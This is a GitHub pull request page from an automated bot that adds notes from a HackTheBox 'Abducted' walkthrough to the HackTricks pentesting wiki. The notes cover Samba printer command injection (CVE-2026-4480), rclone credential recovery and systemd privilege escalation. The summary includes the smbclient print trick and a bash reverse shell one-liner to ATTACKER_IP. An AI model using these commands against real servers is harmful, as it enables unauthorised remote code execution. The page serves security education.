Skip to content

HTB Abducted Samba CVE-2026-4480 RCE, rclone Credential Reco...#2476

Open
carlospolop wants to merge 1 commit into
masterfrom
update_HTB_Abducted_Samba_CVE-2026-4480_RCE_rclone_Cred_57f1a7340a6bdc20
Open

HTB Abducted Samba CVE-2026-4480 RCE, rclone Credential Reco...#2476
carlospolop wants to merge 1 commit into
masterfrom
update_HTB_Abducted_Samba_CVE-2026-4480_RCE_rclone_Cred_57f1a7340a6bdc20

Conversation

@carlospolop

Copy link
Copy Markdown
Collaborator

🤖 Automated Content Update

This PR was automatically generated by the HackTricks News Bot based on a technical blog post.

📝 Source Information

  • Blog URL: https://0xdf.gitlab.io/2026/07/07/htb-abducted.html
  • Blog Title: HTB Abducted: Samba CVE-2026-4480 RCE, rclone Credential Recovery, Wide Links Abuse, and systemd Drop-in Privilege Escalation
  • Suggested Section: Network Services Pentesting > 139,445 - Pentesting SMB for Samba printer CVE-2026-4480 and wide links/force user abuse; Linux Privilege Escalation for writable systemd drop-in directories; optionally Linux Post-Exploitation or generic credential recovery notes for rclone config password recovery

🎯 Content Summary

The blog is a HackTheBox Linux walkthrough for Abducted, a Samba-focused machine. The exploitation chain is: unauthenticated Samba printer command injection via CVE-2026-4480 to get code execution as nobody, readable rclone backup credentials to become scott, Samba wide links plus force user abuse to write into marcus' home directory, and finally local root through a writable systemd smbd.service.d dro...

🔧 Technical Details

Samba printer command injection through %J: If a Samba printer share uses a shell-based print command containing %J, the client-controlled print job name / description may be substituted directly into the command line. In CVE-2026-4480, Samba does not properly escape shell metacharacters in this value; the blog notes only single quotes are replaced with underscores. If the job name is |sh or |bash, the server-side command can become a pipeline that feeds the uploaded spool file to a shell. Minimal exploitation is: create a local file named |sh containing commands, then submit it with smbclient //TARGET/PRINTER -N -c 'print "|sh"'. For a reverse shell, use a file named |bash containing bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1 and submit it with print "|bash".

Triggering Samba print exploitation through spoolss RPC: The sa...

🤖 Agent Actions

Run continuation status:

  • Last sanity check completed successfully
  • Still only one intended file is modified:
    • src/network-services-pentesting/pentesting-smb/README.md
  • Structure remains valid:
    • one ## References
    • references at end
    • banner include still last
  • No new issues or drift detected since the previous verification

No further repository changes are needed right now. The run remains paused and ready for final reporting when requested.


This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.

@carlospolop

Copy link
Copy Markdown
Collaborator Author

🔗 Additional Context

Original Blog Post: https://0xdf.gitlab.io/2026/07/07/htb-abducted.html

Content Categories: Based on the analysis, this content was categorized under "Network Services Pentesting > 139,445 - Pentesting SMB for Samba printer CVE-2026-4480 and wide links/force user abuse; Linux Privilege Escalation for writable systemd drop-in directories; optionally Linux Post-Exploitation or generic credential recovery notes for rclone config password recovery".

Repository Maintenance:

  • MD Files Formatting: 981 files processed

Review Notes:

  • This content was automatically processed and may require human review for accuracy
  • Check that the placement within the repository structure is appropriate
  • Verify that all technical details are correct and up-to-date
  • All .md files have been checked for proper formatting (headers, includes, etc.)

Bot Version: HackTricks News Bot v1.0

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant